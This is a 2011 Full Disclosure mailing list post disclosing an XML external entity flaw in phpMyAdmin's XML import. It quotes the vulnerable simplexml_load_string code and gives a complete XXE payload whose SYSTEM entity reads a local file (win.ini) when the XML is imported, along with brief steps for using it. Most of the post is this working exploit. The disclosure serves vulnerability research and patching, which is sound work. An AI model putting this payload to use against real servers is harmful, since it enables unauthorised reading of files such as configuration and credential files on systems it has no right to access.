Full Disclosure mailing list archives
PhpMyAdmin Arbitrary File Reading
From: WooYun <root () wooyun org>
Date: Wed, 2 Nov 2011 15:30:56 +0800
Hi 80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string function to read xml from user input,this may be exploied to read files from the server or network in libraries/import/xml.php,some code like this /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It's basically a freebee. */ $xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT); unset($buffer); /** * The XML was malformed */ if ($xml === FALSE) { so you just need to make a xml like this <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE wooyun [ <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini"> ]> <pma_xml_export version="1.0" xmlns:pma=" http://www.phpmyadmin.net/some_doc_url/"> <!-- - Structure schemas --> <pma:structure_schemas> <pma:database name="test" collation="utf8_general_ci" charset="utf8"> <pma:table name="ts_ad"> &hi80sec; </pma:table> </pma:database> </pma:structure_schemas> <!-- - 数据库: 'thinksns' --> <database name="thinksns"> <!-- 表 ts_ad --> </database> </pma_xml_export> then import this xml in PhpMyAdmin,you will get the content you want. From:http://www.wooyun.org/bugs/wooyun-2010-03185 :)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PhpMyAdmin Arbitrary File Reading WooYun (Nov 02)